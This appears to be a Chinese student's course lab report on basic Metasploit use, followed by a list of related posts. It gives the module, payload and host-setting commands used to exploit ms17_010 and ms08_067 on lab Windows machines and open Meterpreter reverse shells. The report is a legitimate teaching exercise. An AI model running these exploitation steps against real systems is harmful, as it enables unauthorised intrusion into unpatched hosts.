2. 程式人生 > >2018-2019-2 20165303《網絡攻防技術》Exp5 MSF基礎應用

2018-2019-2 20165303《網絡攻防技術》Exp5 MSF基礎應用

阿新 發佈:2019-04-13
進行 erp alt 基礎應用 1.2 enc 通道 編碼 技術分享

實踐目標

  • 1.主動攻擊實踐ms17_010以及ms08_067
  • 2.針對瀏覽器的攻擊ms13-008(唯一)以及ms11-050以及ms13-069(唯一)
  • 3.針對客戶端的攻擊adobe (Adobe_toolbutton漏洞)
  • 4.輔助模塊browser autopwn(唯一)

問題回答

  • 什麽是exploit

用來打開攻擊者與被攻擊者的通道,將想要傳送的代碼傳到目標靶機中

  • 什麽是payload

真正的攻擊代碼,執行負載的工具,exploit將他傳送到靶機後,執行程序

  • 什麽是encode

encode也就是編碼,改變代碼的形式,使其不容易被發現,為了隱藏並為後面的操作進行鋪墊

任務一 主動攻擊實踐ms17_010以及ms08_067

ms17-010

  • 首先搜索ms17-010
  • 然後設置payload set payload windows/x64/meterpreter/reverse_tcp
  • 然後設置攻擊主機和目標靶機 set lhost 192.168.1.154 set rhost 192.168.1.192
  • 輸入exploit進行攻擊
    技術分享圖片
  • 我設置的攻擊靶機是Windows server2008,可以成功攻擊
    技術分享圖片

ms08-067

  • 首先use exploit/windows/smb/ms08_067_netapi
  • 輸入show options看一下需要設置哪些
    技術分享圖片

  • 然後輸入show payloads看一下有什麽負載
    技術分享圖片

  • 設置lhost 192.168.1.154

  • 設置rhost 192.168.1.235
    技術分享圖片

  • 然後輸入exploit進行攻擊獲得權限
    技術分享圖片
    技術分享圖片

2018-2019-2 20165303《網絡攻防技術》Exp5 MSF基礎應用

相關推薦

20155318 《攻防Exp5 MSF基礎應用

我們 時間 olt 反向 ids lis pro exp port 20155318 《網絡攻防》Exp5 MSF基礎應用 基礎問題 用自己的話解釋什麽是exploit,payload,encode? exploit就相當於是載具,將真正要負責攻擊的代碼傳送到靶機中 pa

20155338 《攻防Exp5 MSF基礎應用

攻擊機 tap ID 操作 參數設置 mage 圖片 session 生活 20155338 《網絡攻防》Exp5 MSF基礎應用 基礎問題回答 1、 用自己的話解釋什麽是exploit,payload,encode? exploit將真正要負責攻擊的代碼傳送到靶機中,相

20155301 《攻防Exp5 MSF基礎應用

shortcut 網絡攻防 自動 flash tar vport 釣魚 基礎 提醒 20155301 《網絡攻防》 Exp5 MSF基礎應用 基礎問題 1.用自己的話解釋什麽是exploit,payload,encode 答:exploit就是利用一些工具的,用來收集目標靶

2018-2019-2對抗技術》Exp0 Kali安裝 Week1 20165319

tool oot article 系統 alt tools 用戶名 安裝失敗 art 安裝kali 我從網上找了相應教程一步一步跟著走,教程鏈接:(https://blog.csdn.net/qq_40950957/article/details/80468030) 安裝成

2018-2019-2對抗技術》Exp0 Kali安裝 Week1 20165202

客戶機 目錄 nes ins date install 結束 main inf 2018-2019-2 《網絡對抗技術》Exp0 Kali安裝 Week1 20165202 一、下載 虛擬機環境 Kali所需要虛擬機軟件為VMware,在之前其他課程中使用的即為VMware

2018-2019-2對抗技術》Exp0 Kali安裝 Week1

com inf http src ima .com exp 圖片 info 2018-2019-2《網絡對抗技術》Exp0 Kali安裝 Week1 2018-2019-2《網絡對抗技術》Exp0 Kali安裝 Week1

# 2018-2019-2對抗技術》Exp2 後門原理與應用 20165210

啟動組 and 攝像頭 完成 lis 準備就緒 下載文件 list ont 2018-2019-2 《網絡對抗技術》Exp2 後門原理與應用 20165210 實驗內容: 使用netcat獲取主機操作Shell,cron啟動。 使用Socat獲取主機操作Shell,任務計

20165214 2018-2019-2對抗技術》Exp3 免殺原理與實踐 Week5

實現 進行 中間 信息 失敗 中一 網絡安全 需要 識別 《網絡對抗技術》Exp3 免殺原理與實踐 Week5 一、實驗內容 1、正確使用msf編碼器,msfvenom生成如jar之類的其他文件,veil-evasion,加殼工具,使用shellcode編程; 2、通過組

2018-2019-2對抗技術》Exp4 惡意代碼分析 Week6 20165311

9.png network 註冊 錄音 電源 ati 文本處理 pushd 端口開放 2018-2019 20165311 網絡對抗 Exp4 惡意代碼分析 實驗內容 系統運行監控(2分) 惡意軟件分析(1.5分) 報告評分(1分) 基礎問題回答

2018-2019-2對抗技術》Exp6 信息搜集與漏洞掃描 20165326

知識 完成 技術分享 需要 語法 診斷 客戶端程序 log 獲取 信息搜集與漏洞掃描 實踐目標 掌握信息搜集的最基礎技能與常用工具的使用方法。 基礎知識 間接:不接觸目標,無直接連接訪問,使用輔助模塊進行收集分析 DNS:執行各種相關查詢 搜索引擎 直接:建立邏輯連接

20165214 2018-2019-2對抗技術》Exp8 Web基礎 Week11—12

serve 命令 請求 瀏覽器歷史記錄 style 失去 網站 his 樣式表 《網絡對抗技術》Exp8 Web基礎 Week11—12 一、實驗目標與內容 1.實踐內容 (1).Web前端HTML 能正常安裝、啟停Apache。理解HTML,理解表單,理解GET與PO

20155232《對抗》Exp5 MSF基礎應用

機構 XP ID 格式 兔子 網段 打印機共享 tcp option 20155232《網絡對抗》Exp5 MSF基礎應用 基礎問題回答 用自己的話解釋什麽是exploit,payload,encode. exploit:就是利用可能存在的漏洞對目標進行攻擊,相當於一個載具

對抗》Exp5 MSF基礎應用

offic 漏洞 以及 無奈 2.3 auxiliary 去除 win 命令 20155336《網絡對抗》Exp5 MSF基礎應用 一、基礎知識回答 用自己的話解釋什麽是exploit,payload,encode exploit:漏洞利用,與靶機進行交互,攻擊靶機的最

20155330 《對抗》 Exp5 MSF基礎應用

ref 及其 smb tel 相關 windows服務 實踐 IE coo 20155330 《網絡對抗》 Exp5 MSF基礎應用 實踐過程記錄 Windows服務滲透:MS08_067漏洞攻擊 攻擊機:kali IP地址:192.168.124.132 靶機:wi

20155333 《對抗》 Exp5 MSF基礎應用

xpl 10.10 inf disco file 總結 format 成功 反向 20155333 《網絡對抗》 Exp5 MSF基礎應用 基礎問題回答 用自己的話解釋什麽是exploit,payload,encode exploit:攻擊手段,是能使攻擊武器(paylo

20155217《對抗》Exp05 MSF基礎應用

圖片 9.png 生成 alt 掌握 速度 方式 rev 得到 20155217《網絡對抗》Exp05 MSF基礎應用 實踐內容 本實踐目標是掌握metasploit的基本應用方式,重點常用的三種攻擊方式的思路。具體需要完成: 一個主動攻擊實踐,如ms08_067; 一個

2018-2019-2 20165303攻防技術Exp5 MSF基礎應用

進行 erp alt 基礎應用 1.2 enc 通道 編碼 技術分享 實踐目標 1.主動攻擊實踐ms17_010以及ms08_067 2.針對瀏覽器的攻擊ms13-008(唯一)以及ms11-050以及ms13-069(唯一) 3.針對客戶端的攻擊adobe (Adobe

2018-2019-2 20165312《攻防技術Exp5 MSF基礎應用

bms olt nal 作用 win7 程序 系統 用戶 .html 2018-2019-2 20165312《網絡攻防技術》Exp5 MSF基礎應用 目錄 一、知識點總結 二、攻擊實例 主動攻擊的實踐 ms08_067 generic/shell_reverse_

2018-2019-2 20165329《攻防技術Exp5 MSF基礎應用

handler 總結 使用 -s sp2 ner 分享圖片 解釋 要求 2018-2019-2 20165329《網絡攻防技術》Exp5 MSF基礎應用 一、實驗 一個主動攻擊實踐,ms08_067 ; 一個針對瀏覽器的攻擊,MS11-050 ; 一個針對客戶端的攻

2018-2019-2 20165315《攻防技術》Exp6 信息搜集與漏洞掃描

標誌位 啟動 計算機 統計 threads ... 域名服務 深入 hack 2018-2019-2 20165315《網絡攻防技術》Exp6 信息搜集與漏洞掃描 目錄 一、實驗內容 二、實驗步驟 1、各種搜索技巧的應用 2、DNS IP註冊信息的查詢 3、基本的掃描技術